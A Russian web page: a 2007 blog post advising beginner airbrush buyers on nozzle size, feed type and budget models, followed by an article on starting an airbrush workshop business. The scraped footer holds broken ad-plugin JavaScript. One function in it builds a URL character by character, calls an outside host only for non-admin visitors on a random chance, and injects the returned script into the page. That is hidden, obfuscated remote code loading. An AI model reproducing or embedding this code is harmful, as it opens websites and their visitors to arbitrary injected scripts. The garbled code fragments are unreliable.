Вообще это тема которая меня достала, не потому что меня ломает назвать модель, мне то как раз не сложно, но все немного иначе. На слово не верит 90% обратившихся. Зачем тогда спрашивать если не принимаете слова на веру? Все понятно, хочется знать, а почему именно этот страшненький и дешевый, а не вот тот красивенький и дорогой.
А вот потому что…
Основная масса девственников в аэрографии ведутся на стоимость, раскрученость бренда, внешний вид и… диаметр сопла. Классические заблуждения от которых пора избавляться товарищи 🙂

СТОИМОСТЬ
Если аэрограф очень дорогой это не значит что он самый лучший, совсем наоборот, для вас как для начинающего этот инструмент будет самым неуместным т.к. ориентирован он в на профи и стоимость подразумевает узкую специализацию, требует серьезной постановки руки, именно под аэрограф, а так же не менее серьезную практическую базу знаний о таких вещах как краски для аэро, работа на различных поверхностях, и пр.и др. У вас такой базы и всего прочего еще нет так что забудьте о машинках стоимостью выше 5000 рублей, не осилите. Хотя… осилите но…не без приключений.

БРЕНД
Если вы то и дело слышите как кто-то пользуется чем-то и слышите это часто подумайте сначала о том что когда-то не так давно большинство этих людей были такими же ламерами в аэрографии и купили они совсем не то что им нужно было а то что им впарили продавцы. Если вся страна пользует Iwata то это не значит что вам он тоже кровь из носа нужен. В России представлено не так много производителей аэро. Выбор ограничен. Ассортимент дохлый по нескольким причинам, о них я как-нибудь отдельно напишу, дело не в этом.

Каждый мастер сам подбирает себе инструмент и далеко не всегда то что подходит кому-то подойдет вам. У меня есть несколько примеров когда народ и я в том числе велся на рекомендации и покупал то что в последствии практически не использовалось, просто потому что не нравится, не лежит в руке, не берет краску которой ты в основном работаешь, причин масса.
Если вам что-то рекомендуют, предлагают всегда имеет смысл задуматься о том кто это говорит и насколько он перегружен опытом в аэрографии и есть ли у него многолетняя практика работы с десятком другим инструментов. Если есть – все отлично, если нет… о чем тут говорить. Бренд не показатель.

ВНЕШНИЙ ВИД
При покупке многие ведуться на эстетику, сколько раз наблюдал – «о давай вот этот возьмем он посолиднее выглядит», — как будто они его покупают не для работы, а в ночном клубе перед малолетками выпендриваться. Не оценят все равно. Инструмент должен быть удобен и практичен, внешний вид роли не играет вообще, никакой. Короче на внешний вид ориентироваться – последнее дело.
От того что молоток красивый гвозди он лучше забивать не станет, но стоить он будет раз в несколько дороже и забивать им гвозди будет жалко, вдруг красота сломается еще.

ДИАМЕТР СОПЛА
А теперь самое главное. Диаметр сопла конечно влияет на толщину линии но совсем не так как вам кажется и прежде чем покупать аэро с соплей 0,2 мотивируя это тем что вы волосы им рисовать сможете, подумайте о том что еще кроме волос вы сможете им нарисовать? Емкости у таких аэро мелкие, сделать широкий распыл тяп-ляп получается. И что интересно большинство красок в это сопло даже не пролезут в итоге намучавшись с плевками, чисткой и корявостью работы вы все равно купите универсальный инструмент.

Несколько рекомендаций (говорю я, опыт работы в инфе прописан)))))):

1.Определитесь с тем что вы собираетесь делать, что рисовать и на чем. Отталкиваясь от основного направления в работе вы и выбираете себе инструмент.

Когда меня спрашивают, что нужно для текстильной аэрографии? – я называю модель, человек покупает, а в итоге начинает рисовать на транспорте автоэмалями и во время чистки резиновые прокладки съедает растворитель… и что? Я крайний…? А какого хрена спрашивается вы хотели используя инструмент не по назначению. На самом деле все это фигня и прокладки съедает не растворитель а мозг того кто в растворителе их вымочил. Но…

Если вам нужен инструмент и для ткани, и для боди арта и для авто аэрографии …то подумайте вот о чем. Для работы на садовом участке необходимы тяпки, грабли, лопаты и прочая муть… хотя в принципе всю работу можно сделать только одной лопатой…геморно но можно, и вот что странно…работать только лопатой никому даже в голову не приходит. Так что не нужно покупать аэрограф которым вы будите и копать и дрова рубить. Если вы хотите работать в нескольких направлениях аэрографии вам и инструментов положено иметь несколько. Или хотя бы несколько комплектов сопел под рукой чтоб были. А еще лучше чтобы и то и другое и третье….но это уже для гурманов.

2.Если площади с которыми вам предстоит работать превышают формат а4 то покупать для начала нужно аэро с бачком от 4 до 7 мл, хотя некоторых прибвает добавлять в бачок краску каждые 5 минут.

3.Вы только пробуете себя в аэрографии и рука еще не поставлена, поэтому выбирайте аэрограф с бачком который плотно закрывается, иначе в кляксах будите не только вы сами но и ваш рисунок.

Первый аэрограф должен быть с гравитационным бачком, те с верхней подачей краски. Без вариантов, кто бы что не говорил, я считаю так и переубедить меня в этом нереально никак.
Ни с нижней подачей краски, ни с боковой, а именно с верхней. И не слушайте балоболок в магазинах, которые рассказывают сказки о прелестях и возможностях других подач, из них мало кто рисовал что-то сложнее крестика. Если не хотите ограничить себя в ассортименте используемых красок – только верхняя. Для нижней и боковой подачи пригодны менее густые краски, которые приходится иногда фильтровать и разводить еще больше, или работать на более высоком давлении…короче если не хотите геморроя с самого начала берите верхнюю. Ну а если любите экстрим и не жалко нервов…на свое усмотрение.

4.Диаметр сопла для первого аэро оптимальный от 0,3 до 0,4. И повторюсь, на толщину линии влияет не только диаметр сопла но и опыт и то насколько хорошо вы чувствуете аэро.

Да и еще не стоит забывать что от того какой у вас компрессор зависит очень многое. Рекомендованные модели аэрографов тестировались на компрессорах
Sparmax АС-500 и AC -101 NA ( маркировка с сайта http://www.sparmax.com.tw/oil-less.htm)

Ниже приведены несколько моделей аэро которые свободно можно купить в России. Напоминаю что этот список только для начинающих. Профи могут выбирать себе все что угодно вам на них ориентироваться не нужно т.к. у каждого из них своя техника рисунка и они четко знают с чем и чем они работают и какого результата ждут. Все игрушки есть в Черной речке, вернее это как раз все что у них есть… Отталкиваться будем от цифры 4 5000 руб.
И еще, все перечисленные мною аэро тестировались на текстильных и акриловых красках, авто эмалях, декор косметике отсюда делайте выводы для чего их можно использовать.
Перечень возможного применения далеко не полный но для тестов это более чем достаточно.

Аэро Про
Из всего что производит это доблестная компания внимания заслуживает АЭРО-ПРО 103 (сопло 0,3мм)= 2200 руб. Вариант — дешево и сердито. Подходит для тех кто еще не определился а для чего ему аэрограф, а вдруг попробую и понравится, либо для тех у кого серьезные проблемы с наличностью и нужен хоть какой-то инструмент на первое время. Если не планируете пойти дальше трафаретов, то на покупке этого можно и остановится. Возможна установка сопла как с меньшим так и с большим диаметром (стоимость сами посмотрите). Вместе с парой дополнительных сопел цена не превысит 4000 руб. Обратите внимании на то что продавцы не могут определится с размером бачка, толи он 9 толи 7 мл.

Hansa
Из всего что представлено на сайте оптимальный вариант у этого производителя Hansa 381 (сопло 0,3мм) = 4100 руб. Несмотря на хлипкие сопла и постоянно умирающие прокладки инструмент вполне сносный. Возможна установка сопла как с меньшим так и с большим диаметром. Оптимальный размер емкости для универсального инструмента. Есть там еще пара моделей но заводская комплектация у них менее интересная и светит покупка дополнительных сопел.

Harder&Steenbeck
Здесь могу предложить только H&S Focus (сопло 0,2мм) либо H&S Evolution (сопло 0,2мм). Первый стоит 3200 руб. второй 3500руб. но… и в первом и во втором случае вам придется докупать комплект с более широким соплом 0,4 (1200 руб.). и придумать как сделать бачок более удобным, а для этого вам нужно потратить еще немного денег на сменный бачок или купить крышку к тому что в комплекте ( да, да крышки отдельно продают, 240 руб. стоит крышка). Поэтому в ценовую категорию 4 500 руб. с большим хрустом попадает H&S Focus + сопло/игла = 4400 руб. У этих машинок есть один плюс – удобно разбирать и промывать сопла, к тому же они не такие мелкие как у других аэрографов. Но есть и ряд минусов, но о них будет подробно в обзоре данных моделей.

Paasche-если только доработать напильником и припаять банку к аэрографу
У этого производителя нашел только один приемлемый вариант Paasche VSR90-1(сопло №1- 0,25мм) = 3700 руб. Особо настаивать не буду т.к. им еще практически не работал, но в целом вроде неплох. Дополнительный комплект сопло-игла 0.66 + уплотнение выходит в 460 руб.

Iwata
В 4 500 рублей укладывается только одна модель Iwata Revolution HP-CR (сопло 0.5мм) = 3 850 руб. Машинка простая, без наворотов, но работает вполне прилично. Правда диаметр сопла, тем кто первый раз себя пробует, не позволит, поначалу, особо тонкие линии рисовать, но… при желании все получится. Вариантов все равно нет, сопла другого диаметра на эту модель не устанавливаются.

Собственно это все. если коротко.

© freeone, 2007
Внимание родные мои! Все статьи в данном сообщетсве являются авторскими. Копирование на другие сайты, перепечатка или иное использование статей без согласия их авторов запрещено (ссылки на автора или на сообщество недостаточно, кому не понятно, могу дать ссылки на закон об авторском праве).

Мастерская аэрографии — как организовать бизнес

  • Пошаговый план открытия мастерской аэрографии
  • Сколько нужно денег для старта бизнеса
  • Сколько можно заработать на аэрографии
  • Оборудование для мастерской
  • Какой ОКВЭД указать при регистрации
  • Какие документы нужны для открытия
  • Система налогообложения
  • Разрешения для открытия
  • Технология нанесения аэрографии

Для творческого человека, умеющего рисовать на профессиональном уровне, а также обладающего предприимчивостью, имеется отличная идея для организации своего бизнеса — создать мастерскую аэрографии.

Аэрография — своеобразный метод нанесения рисунка на различные поверхности жидкой или порошкообразной краской при помощи сжатого воздуха, используя для этого аэрограф. Ее используют с целью нанесения живописных полотен, росписи текстиля и стен, ретуширования фотографий, боди-арта, росписи ногтей. В последнее время этот метод используют для того, чтобы нанести рисунки на автомобили, мотоциклы. Распыляя краску на поверхностях, можно добиться плавных переходов цвета, объемности и реальности изображения. После высыхания краски, рисунок покрывают несколькими слоями закрепляющего лака, он становится несмываемым.

Пошаговый план открытия мастерской аэрографии

  1. Составление подробного бизнес – плана.
  2. Поиск и заключение договора аренды помещения.
  3. Регистрация субъекта хозяйствования.
  4. Поиск и покупка оборудования.
  5. Прием на работу сотрудников.
  6. Проведение рекламной компании

Сколько нужно денег для старта бизнеса

Первоначально для старта необходимо 12 000 – 15 000 долларов США. Эти средства потребуются:

    на аренду мастерской, помещение должно иметь вытяжку и хорошее освещение; регистрацию предприятия; покупку оборудования и расходных материалов.

Сколько можно заработать на аэрографии

Стоимость аэрографических работ зависит от таких факторов: расценок на малярные работы и материалы, от того, насколько сложен рисунок, раскручености мастера.

Самый простой однотонный рисунок будет стоить заказчику от 10 000 руб. Более сложное художественное изображение на фоне, с различными мелкими деталями будет стоить от 25 000 руб. Это стоимость нанесения рисунка на одну деталь автомобиля, например, на крыло или на дверь. Аэрография всего авто стоит намного дороже.

Даже имея небольшое количество заказов, предприниматель может заработать 60 000 руб. в месяц. С целью увеличения доходности бизнеса нужно увеличить спектр услуг, например, наносить рисунки на ноутбуки, компьютеры, предметы интерьера.

Оборудование для мастерской

Для занятий аэрографией необходимо приобрести:

    аэрограф, краскопульт, компрессор, шлифомашину, сушильную камеру, систему вентиляции и очистки воздуха, краски, растворители, лак, кисточки, валики и трафареты, компьютер с графическими программами.

На покупку минимального комплекта оборудования вам понадобится 700 000 руб.

Какой ОКВЭД указать при регистрации

ОКВЭД 96.09 — предоставление прочих персональных услуг, не включенных в другие группировки

Какие документы нужны для открытия

Необходимо зарегистрировать субъект хозяйствования, это будет индивидуальный предприниматель (ИП).

Перечень документов небольшой, да и срок регистрации занимает приблизительно неделю. Госпошлина оплачивается в сумме 800 руб. Кроме того, нужно зарегистрировать предприятие в Пенсионном фонде и Фонде социального и медицинского страхования.

Система налогообложения

В данном бизнесе лучше выбрать упрощенную систему налогообложения (УСН), либо единый налог на вменяемый доход (ЕНВД).

Разрешения для открытия

Бизнесу по нанесению аэрографии не надо получать специальные разрешения и лицензии. Достаточно получить разрешения санитарно – эпидемиологической службы, пожарной инспекции и органов местной администрации.

Технология нанесения аэрографии

Специалист, занимающийся аэрографией, должен обладать навыками художника, то есть уметь рисовать на бумаге. Он должен иметь свой портфолио с образцами рисунков. Нужно учиться мастерству у опытных специалистов, набираться опыта и создавать свой архив рисунков, а только потом организовывать бизнес. Можно начинать бизнес, если у вас есть художник с индивидуальным стилем нанесения рисунков. Это не тот вид бизнеса, который можно поставить на поток, здесь необходимо творческое начало.

Несмотря на то, что аэрографию нельзя назвать сезонным бизнесом, все же ему присуща сезонная направленность. К примеру, аэрография на мотоциклах востребована в зимнее время года, а на автомобилях в весеннее и осеннее время года. Летом же аэрографы расписывают помещения квартир и домов.

В наше время очень востребованным стало нанесение рисунка на авто, на него бросают взгляды окружающие, да и угнать такой автомобиль крайне сложно, он очень примечательный. В мастерской аэрографии по нанесению рисунков на автомобили обязательно кроме художника, должны быть кузовщик и маляр. Не понимая этого, некоторые предприниматели экономят на кузовщиках, в результате работа получается «халтурная». Вариант выхода из такой ситуации есть, если у предпринимателя имеется своё СТО со многими специалистами, тогда можно приглашать на аэрографию опытного художника.

Вначале у заказчика выясняют, какой рисунок он хотел бы видеть на своем авто. Далее делают компьютерный эскиз, что позволяет заказчику увидеть, как он будет выглядеть. Если его все устраивает, тогда приступают наносить рисунок. Аэрография различается двух видов:

  1. Когда рисунок наносится одной или несколькими красками. Здесь фоном выступает основной цвет автомобиля.
  2. Изображение с использованием нескольких цветов, здесь фоном может быть не столько цвет авто, сколько другие оттенки.

Прежде, чем наносить изображение, с транспортного средства должны быть устранены все изъяны, полученные в процессе эксплуатации. Авто шлифуется абразивными веществами. Чтобы нанести аэрографию художник использует колеры подходящих цветов. После того, как рисунок нанесен, автомобиль покрывают защитным лаком. Это дает возможность сохранить яркость изображения, и если автомобиль не будет попадать в аварии, то будет радовать автолюбителя на протяжении 6-7 лет. По завершению работ, автомобиль отправляют в сушильную камеру, в которой температура должна быть на уровне 60 градусов. Процесс нанесения рисунка занимает от 2 недель до одного месяца, все зависит от сложности работы. Машина, на которую нанесли изображение, не требует особого ухода, но все же следует придерживаться некоторых правил:

  1. Мыть автомобиль аэрографических работ, следует через 3 – 4 дня, а то и через неделю, в зависимости от времени года.
  2. Нельзя вытирать авто грязной щеткой или тряпкой, а тем более применять чистящие средства, которые могут нанести повреждения, в виде царапин.
  3. Чистить поверхность авто надо в специальных автомойках, где мойку производят под высоким давлением.
  4. Чтобы дольше сохранить нанесенную композицию, нужно использовать специальные аэрозольные средства.

Наносят рисунки не только на автомобили или мотоциклы, но и на мобильные телефоны, компьютеры, текстиль, в боди-арте, на ногти, то есть сфера применения достаточно широка. И также широка сфера заработка, связанная с автомобилями.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика